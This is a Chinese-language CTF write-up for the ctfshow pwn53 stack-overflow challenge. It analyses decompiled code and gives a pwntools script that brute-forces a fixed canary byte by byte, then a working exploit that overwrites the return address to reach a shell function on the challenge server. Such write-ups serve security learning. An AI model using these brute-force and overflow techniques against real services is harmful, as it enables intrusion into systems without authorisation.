checksec<\/p>\n\n\n\n
[*] 'C:\\\\Users\\\\26597\\\\Desktop\\\\pwn53'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No<\/code><\/pre>\n\n\n\n32\u4f4d\u5c0f\u7aef\u5e8f<\/p>\n\n\n\n
\u672c\u5730\u8fd0\u884c\u4ee5\u4e0b\u5148\u770b\u770b<\/p>\n\n\n\n
ctfshow@ubuntu:~\/Desktop\/xd$ .\/pwn53
\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584
\u2588\u2588\u2580\u2580\u2580\u2580\u2588 \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580 \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580 \u2588\u2588
\u2588\u2588\u2580 \u2588\u2588 \u2588\u2588 \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588
\u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2584\u2584\u2584\u2584 \u2580 \u2588\u2588\u2580 \u2588\u2588 \u2588\u2588\u2580 \u2580\u2588\u2588 \u2580\u2588 \u2588\u2588 \u2588\u2580
\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588 \u2580\u2580\u2580\u2580\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588
\u2588\u2588\u2584\u2584\u2584\u2584\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580 \u2580\u2588\u2588 \u2588\u2588\u2580
\u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580 \u2580\u2580\u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580 \u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580
* *************************************
* Classify: CTFshow --- PWN --- \u5165\u95e8
* Type : Stack_Overflow
* Site : https:\/\/ctf.show\/
* Hint : Do you know how Canary works?
* *************************************
\/canary.txt: No such file or directory.<\/code><\/pre>\n\n\n\n\u62a5\u9519\u4e86\uff0c\u8fd0\u884c\u4e0d\u4e0b\u53bb<\/p>\n\n\n\n
main\u51fd\u6570\u7684\u8fd0\u884c\u903b\u8f91\u5728\u8fc7\u5b8clogo\u51fd\u6570\u8fdb\u5165canary\u51fd\u6570\u540e\u5c31\u7ed3\u675f\u4e86<\/p>\n\n\n\n
canary\u51fd\u6570\uff1a<\/p>\n\n\n\n
int canary()
{
FILE *stream; \/\/ [esp+Ch] [ebp-Ch]
\u200b
stream = fopen(\"\/canary.txt\", \"r\");
if ( !stream )
{
puts(\"\/canary.txt: No such file or directory.\");
exit(0);
}
fread(&global_canary, 1u, 4u, stream);
return fclose(stream);
}<\/code><\/pre>\n\n\n\n\u8fd9\u4e2a\u51fd\u6570\u7684\u4f5c\u7528\u662f\u4ece\u4e00\u4e2a\u540d\u4e3a \/canary.txt<\/code> \u7684\u6587\u4ef6\u4e2d\u8bfb\u53d6\u4e00\u4e2a\u503c\uff0c\u5e76\u5c06\u5176\u5b58\u50a8\u5230\u5168\u5c40\u53d8\u91cf global_canary<\/code> \u4e2d\u3002\u4ee5\u4e0b\u662f\u51fd\u6570\u7684\u8be6\u7ec6\u903b\u8f91\u5206\u6790\uff1a<\/p>\n\n\n\n1. \u51fd\u6570\u58f0\u660e<\/strong><\/h3>\n\n\n\nint canary()<\/pre>\n\n\n\n
\n- \u8fd9\u662f\u4e00\u4e2a\u65e0\u53c2\u6570\u7684\u51fd\u6570\uff0c\u8fd4\u56de\u503c\u4e3a
int<\/code> \u7c7b\u578b\u3002<\/li>\n<\/ul>\n\n\n\n2. \u5c40\u90e8\u53d8\u91cf\u58f0\u660e<\/strong><\/h3>\n\n\n\nFILE *stream;<\/pre>\n\n\n\n
\n- \u58f0\u660e\u4e86\u4e00\u4e2a\u6307\u5411
FILE<\/code> \u7c7b\u578b\u7684\u6307\u9488 stream<\/code>\uff0c\u7528\u4e8e\u540e\u7eed\u7684\u6587\u4ef6\u64cd\u4f5c\u3002<\/li>\n<\/ul>\n\n\n\n3. \u6253\u5f00\u6587\u4ef6<\/strong><\/h3>\n\n\n\nstream = fopen(\"\/canary.txt\", \"r\");<\/pre>\n\n\n\n
\n- \u4f7f\u7528
fopen<\/code> \u51fd\u6570\u5c1d\u8bd5\u4ee5\u53ea\u8bfb\u6a21\u5f0f\uff08\"r\"<\/code>\uff09\u6253\u5f00\u6587\u4ef6 \/canary.txt<\/code>\u3002<\/li>\n\n\n\n- \u5982\u679c\u6587\u4ef6\u6253\u5f00\u6210\u529f\uff0c
stream<\/code> \u5c06\u6307\u5411\u8be5\u6587\u4ef6\u7684\u6587\u4ef6\u6d41\uff1b\u5982\u679c\u5931\u8d25\uff0cstream<\/code> \u5c06\u4e3a NULL<\/code>\u3002<\/li>\n<\/ul>\n\n\n\n4. \u68c0\u67e5\u6587\u4ef6\u662f\u5426\u6253\u5f00\u6210\u529f<\/strong><\/h3>\n\n\n\nif (!stream)
{
puts(\"\/canary.txt: No such file or directory.\");
exit(0);
}<\/pre>\n\n\n\n
\n- \u5982\u679c
stream<\/code> \u4e3a NULL<\/code>\uff0c\u8bf4\u660e\u6587\u4ef6\u6253\u5f00\u5931\u8d25\u3002<\/li>\n\n\n\n- \u8f93\u51fa\u9519\u8bef\u4fe1\u606f\uff1a
\/canary.txt: No such file or directory.<\/code>\u3002<\/li>\n\n\n\n- \u8c03\u7528
exit(0)<\/code> \u7ec8\u6b62\u7a0b\u5e8f\u8fd0\u884c\u3002<\/li>\n<\/ul>\n\n\n\n5. \u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9<\/strong><\/h3>\n\n\n\nfread(&global_canary, 1u, 4u, stream);<\/pre>\n\n\n\n
\n- \u4f7f\u7528
fread<\/code> \u51fd\u6570\u4ece\u6587\u4ef6\u6d41 stream<\/code> \u4e2d\u8bfb\u53d6\u6570\u636e\u3002<\/li>\n\n\n\n- \u53c2\u6570\u89e3\u91ca\uff1a\n
\n&global_canary<\/code>\uff1a\u76ee\u6807\u5730\u5740\uff0c\u5c06\u8bfb\u53d6\u7684\u6570\u636e\u5b58\u50a8\u5230\u5168\u5c40\u53d8\u91cf global_canary<\/code> \u4e2d\u3002<\/li>\n\n\n\n1u<\/code>\uff1a\u6bcf\u4e2a\u6570\u636e\u5757\u7684\u5927\u5c0f\u4e3a 1 \u5b57\u8282\u3002<\/li>\n\n\n\n4u<\/code>\uff1a\u8bfb\u53d6 4 \u4e2a\u6570\u636e\u5757\uff0c\u5373\u603b\u5171\u8bfb\u53d6 4 \u5b57\u8282\u3002<\/li>\n\n\n\nstream<\/code>\uff1a\u6587\u4ef6\u6d41\u6307\u9488\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n- \u8fd9\u91cc\u5047\u8bbe
global_canary<\/code> \u662f\u4e00\u4e2a 4 \u5b57\u8282\u7684\u53d8\u91cf\uff08\u4f8b\u5982 int<\/code> \u6216 uint32_t<\/code> \u7c7b\u578b\uff09\uff0c\u51fd\u6570\u4f1a\u4ece\u6587\u4ef6\u4e2d\u8bfb\u53d6 4 \u5b57\u8282\u7684\u6570\u636e\u5e76\u5b58\u50a8\u5230 global_canary<\/code> \u4e2d\u3002<\/li>\n<\/ul>\n\n\n\n6. \u5173\u95ed\u6587\u4ef6<\/strong><\/h3>\n\n\n\nreturn fclose(stream);<\/pre>\n\n\n\n
\n- \u4f7f\u7528
fclose<\/code> \u51fd\u6570\u5173\u95ed\u6587\u4ef6\u6d41 stream<\/code>\u3002<\/li>\n\n\n\nfclose<\/code> \u7684\u8fd4\u56de\u503c\u4e3a int<\/code> \u7c7b\u578b\uff1a\n\n- \u5982\u679c\u6210\u529f\u5173\u95ed\u6587\u4ef6\uff0c\u8fd4\u56de 0\u3002<\/li>\n\n\n\n
- \u5982\u679c\u5173\u95ed\u5931\u8d25\uff0c\u8fd4\u56de\u975e\u96f6\u503c\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n
- \u51fd\u6570\u8fd4\u56de
fclose<\/code> \u7684\u7ed3\u679c\u3002<\/li>\n<\/ul>\n\n\n\n\u51fd\u6570\u603b\u7ed3<\/strong><\/h3>\n\n\n\n\n- \u529f\u80fd<\/strong>\uff1a\u4ece\u6587\u4ef6
\/canary.txt<\/code> \u4e2d\u8bfb\u53d6 4 \u5b57\u8282\u7684\u6570\u636e\uff0c\u5e76\u5c06\u5176\u5b58\u50a8\u5230\u5168\u5c40\u53d8\u91cf global_canary<\/code> \u4e2d\u3002<\/li>\n\n\n\n- \u8f93\u5165<\/strong>\uff1a\u65e0\u53c2\u6570\uff0c\u4f46\u4f9d\u8d56\u4e8e\u6587\u4ef6
\/canary.txt<\/code>\u3002<\/li>\n\n\n\n- \u8f93\u51fa<\/strong>\uff1a\n
\n- \u5982\u679c\u6587\u4ef6\u4e0d\u5b58\u5728\uff0c\u8f93\u51fa\u9519\u8bef\u4fe1\u606f\u5e76\u9000\u51fa\u7a0b\u5e8f\u3002<\/li>\n\n\n\n
- \u5982\u679c\u6587\u4ef6\u5b58\u5728\uff0c\u8bfb\u53d6\u6570\u636e\u5e76\u5173\u95ed\u6587\u4ef6\uff0c\u8fd4\u56de
fclose<\/code> \u7684\u7ed3\u679c\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n\u8fd9\u65f6\u5019\u8fd4\u56de\u6765\u770b\u672c\u5730\u8fd0\u884c\u7684\u7ed3\u679c\uff0c\u76f4\u63a5\u8fd4\u56de\u62a5\u9519\u4fe1\u606f\u7684\u539f\u56e0\u5e94\u8be5\u662f\u672c\u5730\u4e0d\u5b58\u5728canary.txt\u8fd9\u4e2a\u6587\u4ef6<\/p>\n\n\n\n
\u6240\u4ee5\u8fd9\u6b21\u6253\u8fdc\u7a0b\u662f\u4e0d\u4f1a\u51fa\u73b0\u8fd9\u6837\u7684\u62a5\u9519\u7684<\/p>\n\n\n\n
\u6b63\u5e38nc<\/p>\n\n\n\n
C:\\Users\\26597>nc pwn.challenge.ctf.show 28283
\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584
\u2588\u2588\u2580\u2580\u2580\u2580\u2588 \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580 \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580 \u2588\u2588
\u2588\u2588\u2580 \u2588\u2588 \u2588\u2588 \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588
\u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2584\u2584\u2584\u2584 \u2580 \u2588\u2588\u2580 \u2588\u2588 \u2588\u2588\u2580 \u2580\u2588\u2588 \u2580\u2588 \u2588\u2588 \u2588\u2580
\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588 \u2580\u2580\u2580\u2580\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588
\u2588\u2588\u2584\u2584\u2584\u2584\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580 \u2580\u2588\u2588 \u2588\u2588\u2580
\u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580 \u2580\u2580\u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580 \u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580
* *************************************
* Classify: CTFshow --- PWN --- \u5165\u95e8
* Type : Stack_Overflow
* Site : https:\/\/ctf.show\/
* Hint : Do you know how Canary works?
* *************************************
How many bytes do you want to write to the buffer?<\/code><\/pre>\n\n\n\n\u679c\u7136\u62a5\u9519\u4fe1\u606f\u4e0d\u4e00\u6837<\/p>\n\n\n\n
\u6240\u4ee5canary\u51fd\u6570\u672c\u8eab\u53ea\u662f\u68c0\u67e5canary.txt\u662f\u5426\u5b58\u5728\u7684<\/p>\n\n\n\n
\u5e76\u4e0d\u9700\u8981\u5728\u610f<\/p>\n\n\n\n
\u6309\u7167main\u51fd\u6570\u903b\u8f91<\/p>\n\n\n\n
canary\u51fd\u6570\u6267\u884c\u540e\u5c31\u662fctfshow\u51fd\u6570<\/p>\n\n\n\n
ctfshow\u51fd\u6570\u4ee3\u7801\uff1a<\/p>\n\n\n\n
int ctfshow()
{
size_t nbytes; \/\/ [esp+4h] [ebp-54h] BYREF
_BYTE v2[32]; \/\/ [esp+8h] [ebp-50h] BYREF
_BYTE buf[32]; \/\/ [esp+28h] [ebp-30h] BYREF
int s1; \/\/ [esp+48h] [ebp-10h] BYREF
int v5; \/\/ [esp+4Ch] [ebp-Ch]
\u200b
v5 = 0;
s1 = global_canary;
printf(\"How many bytes do you want to write to the buffer?\\n>\");
while ( v5 <= 31 )
{
read(0, &v2[v5], 1u);
if ( v2[v5] == 10 )
break;
++v5;
}
__isoc99_sscanf(v2, \"%d\", &nbytes);
printf(\"$ \");
read(0, buf, nbytes);
if ( memcmp(&s1, &global_canary, 4u) )
{
puts(\"Error *** Stack Smashing Detected *** : Canary Value Incorrect!\");
exit(-1);
}
puts(\"Where is the flag?\");
return fflush(stdout);
}<\/code><\/pre>\n\n\n\n\u8fd9\u6bb5\u4ee3\u7801\u5b9e\u73b0\u4e86\u4e00\u4e2a\u7b80\u5355\u7684\u7528\u6237\u4ea4\u4e92\u7a0b\u5e8f\uff0c\u5176\u4e3b\u8981\u529f\u80fd\u662f\u4ece\u7528\u6237\u8f93\u5165\u4e2d\u8bfb\u53d6\u6570\u636e\u5e76\u5199\u5165\u7f13\u51b2\u533a\uff0c\u540c\u65f6\u901a\u8fc7\u201c\u91d1\u4e1d\u96c0\u503c\u201d\uff08canary value\uff09\u68c0\u6d4b\u662f\u5426\u5b58\u5728\u5806\u6808\u6ea2\u51fa\u653b\u51fb\u3002\u4ee5\u4e0b\u662f\u4ee3\u7801\u7684\u8be6\u7ec6\u903b\u8f91\u5206\u6790\uff1a<\/p>\n\n\n\n
\n\n\n\n1. \u51fd\u6570\u58f0\u660e<\/strong><\/h3>\n\n\n\nint ctfshow()<\/pre>\n\n\n\n
\n- \u8fd9\u662f\u4e00\u4e2a\u65e0\u53c2\u6570\u7684\u51fd\u6570\uff0c\u8fd4\u56de\u503c\u4e3a
int<\/code> \u7c7b\u578b\u3002<\/li>\n<\/ul>\n\n\n\n
\n\n\n\n2. \u5c40\u90e8\u53d8\u91cf\u58f0\u660e<\/strong><\/h3>\n\n\n\nsize_t nbytes; \/\/ \u7528\u4e8e\u5b58\u50a8\u7528\u6237\u8f93\u5165\u7684\u5b57\u8282\u6570
_BYTE v2[32]; \/\/ \u7528\u4e8e\u5b58\u50a8\u7528\u6237\u8f93\u5165\u7684\u6570\u5b57\u5b57\u7b26\u4e32\uff08\u6700\u591a32\u5b57\u8282\uff09
_BYTE buf[32]; \/\/ \u7528\u4e8e\u5b58\u50a8\u7528\u6237\u8f93\u5165\u7684\u6700\u7ec8\u6570\u636e\uff08\u6700\u591a32\u5b57\u8282\uff09
int s1; \/\/ \u7528\u4e8e\u5b58\u50a8\u5168\u5c40\u91d1\u4e1d\u96c0\u503c\u7684\u526f\u672c
int v5; \/\/ \u7528\u4e8e\u5faa\u73af\u63a7\u5236<\/pre>\n\n\n\n
\n\n\n\n3. \u521d\u59cb\u5316\u53d8\u91cf<\/strong><\/h3>\n\n\n\nv5 = 0;
s1 = global_canary;<\/pre>\n\n\n\n
\nv5<\/code> \u521d\u59cb\u5316\u4e3a 0<\/code>\uff0c\u7528\u4e8e\u540e\u7eed\u5faa\u73af\u63a7\u5236\u3002<\/li>\n\n\n\ns1<\/code> \u88ab\u521d\u59cb\u5316\u4e3a\u5168\u5c40\u53d8\u91cf global_canary<\/code> \u7684\u503c\uff0c\u8fd9\u662f\u4e00\u4e2a\u201c\u91d1\u4e1d\u96c0\u503c\u201d\uff0c\u7528\u4e8e\u68c0\u6d4b\u5806\u6808\u6ea2\u51fa\u3002<\/li>\n<\/ul>\n\n\n\n
\n\n\n\n4. \u63d0\u793a\u7528\u6237\u8f93\u5165\u5b57\u8282\u6570<\/strong><\/h3>\n\n\n\nprintf(\"How many bytes do you want to write to the buffer?\\n>\");<\/pre>\n\n\n\n
\n- \u7a0b\u5e8f\u63d0\u793a\u7528\u6237\u8f93\u5165\u8981\u5199\u5165\u7f13\u51b2\u533a\u7684\u5b57\u8282\u6570\u3002“<\/li>\n<\/ul>\n\n\n\n
\n\n\n\n5. \u8bfb\u53d6\u7528\u6237\u8f93\u5165\u7684\u6570\u5b57\u5b57\u7b26\u4e32<\/strong><\/h3>\n\n\n\nwhile (v5 <= 31)
{
read(0, &v2[v5], 1u); \/\/ \u4ece\u6807\u51c6\u8f93\u5165\u8bfb\u53d6\u4e00\u4e2a\u5b57\u8282
if (v2[v5] == 10) \/\/ \u5982\u679c\u662f\u6362\u884c\u7b26\uff08\u56de\u8f66\uff09\uff0c\u7ed3\u675f\u8f93\u5165
break;
++v5;
}
__isoc99_sscanf(v2, \"%d\", &nbytes); \/\/ \u5c06\u8f93\u5165\u7684\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u6574\u6570<\/pre>\n\n\n\n
\n- \u4f7f\u7528
read<\/code> \u51fd\u6570\u9010\u5b57\u8282\u8bfb\u53d6\u7528\u6237\u8f93\u5165\uff0c\u76f4\u5230\u9047\u5230\u6362\u884c\u7b26\uff08\\n<\/code>\uff09\u3002<\/li>\n\n\n\n- \u6700\u591a\u8bfb\u53d632\u5b57\u8282\uff0c\u5b58\u50a8\u5230
v2<\/code> \u6570\u7ec4\u4e2d\u3002<\/li>\n\n\n\n- \u4f7f\u7528
__isoc99_sscanf<\/code> \u5c06\u8f93\u5165\u7684\u5b57\u7b26\u4e32\u89e3\u6790\u4e3a\u6574\u6570\uff0c\u5b58\u50a8\u5230 nbytes<\/code> \u4e2d\u3002<\/li>\n<\/ul>\n\n\n\n
\n\n\n\n6. \u63d0\u793a\u7528\u6237\u8f93\u5165\u6570\u636e<\/strong><\/h3>\n\n\n\nprintf(\"$ \");<\/pre>\n\n\n\n
\n- \u7a0b\u5e8f\u63d0\u793a\u7528\u6237\u8f93\u5165\u5b9e\u9645\u8981\u5199\u5165\u7f13\u51b2\u533a\u7684\u6570\u636e\u3002<\/li>\n<\/ul>\n\n\n\n
\n\n\n\n7. \u8bfb\u53d6\u7528\u6237\u8f93\u5165\u7684\u6570\u636e<\/strong><\/h3>\n\n\n\nread(0, buf, nbytes);<\/pre>\n\n\n\n
\n- \u4f7f\u7528
read<\/code> \u51fd\u6570\u4ece\u6807\u51c6\u8f93\u5165\u8bfb\u53d6 nbytes<\/code> \u5b57\u8282\u7684\u6570\u636e\uff0c\u5e76\u5b58\u50a8\u5230 buf<\/code> \u6570\u7ec4\u4e2d\u3002<\/li>\n<\/ul>\n\n\n\n
\n\n\n\n8. \u68c0\u6d4b\u5806\u6808\u6ea2\u51fa<\/strong><\/h3>\n\n\n\nif (memcmp(&s1, &global_canary, 4u))
{
puts(\"Error *** Stack Smashing Detected *** : Canary Value Incorrect!\");
exit(-1);
}<\/pre>\n\n\n\n
\n- \u4f7f\u7528
memcmp<\/code> \u6bd4\u8f83 s1<\/code> \u548c global_canary<\/code> \u7684\u503c\u3002<\/li>\n\n\n\n- \u5982\u679c\u5b83\u4eec\u4e0d\u76f8\u7b49\uff0c\u8bf4\u660e\u5806\u6808\u53ef\u80fd\u88ab\u7834\u574f\uff08\u4f8b\u5982\uff0c\u7531\u4e8e\u7f13\u51b2\u533a\u6ea2\u51fa\u653b\u51fb\uff09\uff0c\u7a0b\u5e8f\u4f1a\u8f93\u51fa\u9519\u8bef\u4fe1\u606f\u5e76\u9000\u51fa\u3002<\/li>\n<\/ul>\n\n\n\n
\n\n\n\n9. \u8f93\u51fa\u63d0\u793a\u4fe1\u606f<\/strong><\/h3>\n\n\n\nputs(\"Where is the flag?\");
return fflush(stdout);<\/pre>\n\n\n\n
\n- \u8f93\u51fa\u63d0\u793a\u4fe1\u606f\uff1a\u201cWhere is the flag?\u201d\u3002<\/li>\n\n\n\n
- \u4f7f\u7528
fflush(stdout)<\/code> \u6e05\u7a7a\u6807\u51c6\u8f93\u51fa\u7f13\u51b2\u533a\uff0c\u786e\u4fdd\u6240\u6709\u5185\u5bb9\u90fd\u88ab\u8f93\u51fa\u3002<\/li>\n<\/ul>\n\n\n\n\n- \u529f\u80fd<\/strong>\uff1a\u7a0b\u5e8f\u8981\u6c42\u7528\u6237\u8f93\u5165\u8981\u5199\u5165\u7f13\u51b2\u533a\u7684\u5b57\u8282\u6570\uff0c\u7136\u540e\u8bfb\u53d6\u76f8\u5e94\u6570\u91cf\u7684\u6570\u636e\u5230\u7f13\u51b2\u533a\u3002\u540c\u65f6\uff0c\u901a\u8fc7\u201c\u91d1\u4e1d\u96c0\u503c\u201d\u68c0\u6d4b\u5806\u6808\u662f\u5426\u88ab\u7834\u574f\u3002<\/li>\n\n\n\n
- \u5b89\u5168\u673a\u5236<\/strong>\uff1a\n
\n- \u4f7f\u7528\u91d1\u4e1d\u96c0\u503c\uff08
global_canary<\/code>\uff09\u68c0\u6d4b\u5806\u6808\u6ea2\u51fa\u3002<\/li>\n\n\n\n- \u5982\u679c\u7528\u6237\u8f93\u5165\u7684\u5b57\u8282\u6570\u8d85\u8fc7\u7f13\u51b2\u533a\u5927\u5c0f\uff0832\u5b57\u8282\uff09\uff0c\u53ef\u80fd\u4f1a\u5bfc\u81f4\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u4f46\u91d1\u4e1d\u96c0\u503c\u4f1a\u68c0\u6d4b\u5230\u8fd9\u79cd\u5f02\u5e38\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n
\u81f3\u6b64\u57fa\u672c\u4e0a\u5c31\u80fd\u5199exp\u4e86<\/p>\n\n\n\n
\u9996\u8981\u76ee\u7684\u662f\u5148\u7206\u7834\u51facarnary\u7684\u503c<\/p>\n\n\n\n
carnary\u7684\u503c\u662f4\u5b57\u8282<\/p>\n\n\n\n
\u800c\u4e00\u5b57\u8282\u67098\u4f4d<\/p>\n\n\n\n
\u6240\u6709\u5b57\u8282\u67092^8=256\u79cd\u53ef\u80fd<\/p>\n\n\n\n
\u6240\u4ee5\u901a\u8fc7\u5d4c\u5957\u5faa\u73af\u5c31\u53ef\u4ee5\u8fdb\u884c\u7206\u7834<\/p>\n\n\n\n
\u62f7\u6253ai\uff1a<\/p>\n\n\n\n
from pwn import *
import sys
\u200b
host = 'pwn.challenge.ctf.show'
port = 28242
\u200b
canary = b''
\u200b
\u200b
def brute_canary():
global canary
for i in range(4):
for guess in range(256):
io = remote(host, port)
payload = b'A' * 32 # \u586b\u5145 buf \u6570\u7ec4
payload += canary # \u5df2\u77e5\u7684 canary \u90e8\u5206
payload += p8(guess) # \u5f53\u524d\u731c\u6d4b\u7684\u5b57\u8282
\u200b
try:
io.sendlineafter(b'>', b'100')
io.sendafter(b'$ ', payload)
response = io.recvline(timeout=2)
io.close()
if b'Canary Value Incorrect!' not in response:
canary += p8(guess)
print(
f\"[+] Found byte {i + 1}: {hex(guess)} (ASCII: {chr(guess) if guess > 0x1f else chr(guess + 0x37)} )\")
break
except EOFError:
io.close()
continue
\u200b
\u200b
if __name__ == \"__main__\":
brute_canary()
print(f\"\\n[+] Global Canary (HEX): {canary.hex()}\")
print(f\"[+] Global Canary (ASCII): {canary.decode('latin-1', errors='replace')}\")<\/code><\/pre>\n\n\n\n\u6700\u7ec8\u7ed3\u679c\uff1a<\/p>\n\n\n\n
[+] Global Canary (HEX): 33364421
[+] Global Canary (ASCII): 36D!<\/code><\/pre>\n\n\n\n\u6839\u636e\u8fd9\u4e2acanary\u503c\u7f16\u5199\u6700\u7ec8\u7684exp\uff1a<\/p>\n\n\n\n
from pwn import *
sh = remote(\"pwn.challenge.ctf.show\", 28242)
bin_sh = 0x08048696
canary = b'\\x33\\x36\\x44\\x21'
payload = b'a'*(0x20) + canary + b'a'*(0x10) + p32(bin_sh)
#payload = b'a'*(0x20) + canary + p32(0x0)*4 + p32(bin_sh)
sh.sendline(\"1000\")
sh.send(payload)
sh.interactive()<\/code><\/pre>\n\n\n\npayload\u6709\u4e24\u4e2a\u9700\u8981\u6ce8\u610f\u7684\u5730\u65b9<\/p>\n\n\n\n
1.\u56e0\u4e3a\u7528\u6237\u8f93\u5165\u7684\u5b57\u8282\u6570\u4e00\u65e6\u8d85\u8fc7\u7f13\u51b2\u533a\u5927\u5c0f\uff0832\u5b57\u8282\uff09\uff0c\u4f1a\u5bfc\u81f4\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u91d1\u4e1d\u96c0\u503c\u4f1a\u68c0\u6d4b\u5230\u8fd9\u79cd\u5f02\u5e38<\/p>\n\n\n\n
\u6240\u4ee5payload\u4e2d\u7b2c\u4e00\u6b21\u586b\u5145\u6570\u636e\u53ea\u586b\u5165\u4e860x20\uff0c\u800c\u4e0d\u662f\u76f4\u63a5\u586b\u5165buf\u5230\u6808\u5e95\u7684\u957f\u5ea60x30<\/p>\n\n\n\n
\u7136\u540e\u63a5\u4e0a\u7206\u7834\u5f97\u51fa\u7684canary\u503c<\/p>\n\n\n\n
\u518d\u5c06\u5230\u6808\u5e95\u7684\u5730\u5740\u7ed9\u8986\u76d6\u6389\uff0c\u800c\u5269\u4e0b\u9700\u8981\u586b\u5165\u7684\u6570\u636e\u5c31\u662f0x30-0x20\u7684\u90e8\u5206<\/p>\n\n\n\n
(\u53e6\u5916\u4e00\u79cdpayload\u4e5f\u662f\u4e00\u6837\u7684\uff0c\u672c\u8d28\u4e0a\u90fd\u662f\u586b\u5145\u5b9e\u9645\u4e3a16\u5b57\u8282\u7684\u4e1c\u897f\u8fdb\u53bb\u8986\u76d6\u6389\u5230\u6808\u5e95\u7684\u6240\u6709\u5730\u5740)<\/p>\n\n\n\n
2.\u56e0\u4e3a\u6709\u4e24\u6b21\u8f93\u5165<\/p>\n\n\n\n
\u6240\u4ee5\u9700\u8981\u5148sendline<\/p>\n\n\n\n
\u8fd9\u91ccsendline\u7684\u610f\u4e49\u662f\u81ea\u5b9a\u4e49\u4e00\u4e2a\u4e0b\u4e00\u6b21read\u7684\u957f\u5ea6(\u8be6\u89c14\uff0c5)<\/p>\n\n\n\n
\u8fd9\u6837\u5c31\u80fd\u62ff\u5230flag<\/p>\n\n\n\n
[x] Opening connection to pwn.challenge.ctf.show on port 28198
[x] Opening connection to pwn.challenge.ctf.show on port 28198: Trying 124.223.158.81
D:\\python\\pythonProject\\pwn53.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes
sh.sendline(\"1000\")
[+] Opening connection to pwn.challenge.ctf.show on port 28198: Done
[*] Switching to interactive mode
\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584
\u2588\u2588\u2580\u2580\u2580\u2580\u2588 \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580 \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580 \u2588\u2588
\u2588\u2588\u2580 \u2588\u2588 \u2588\u2588 \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588
\u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2584\u2584\u2584\u2584 \u2580 \u2588\u2588\u2580 \u2588\u2588 \u2588\u2588\u2580 \u2580\u2588\u2588 \u2580\u2588 \u2588\u2588 \u2588\u2580
\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588 \u2580\u2580\u2580\u2580\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588
\u2588\u2588\u2584\u2584\u2584\u2584\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580 \u2580\u2588\u2588 \u2588\u2588\u2580
\u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580 \u2580\u2580\u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580 \u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580
\u200b
* *************************************
\u200b
* Classify: CTFshow --- PWN --- \u5165\u95e8
* Type : Stack_Overflow
* Site : https:\/\/ctf.show\/
* Hint : Do you know how Canary works?
\u200b
* *************************************
\u200b
How many bytes do you want to write to the buffer?
\u200b
$ Where is the flag?
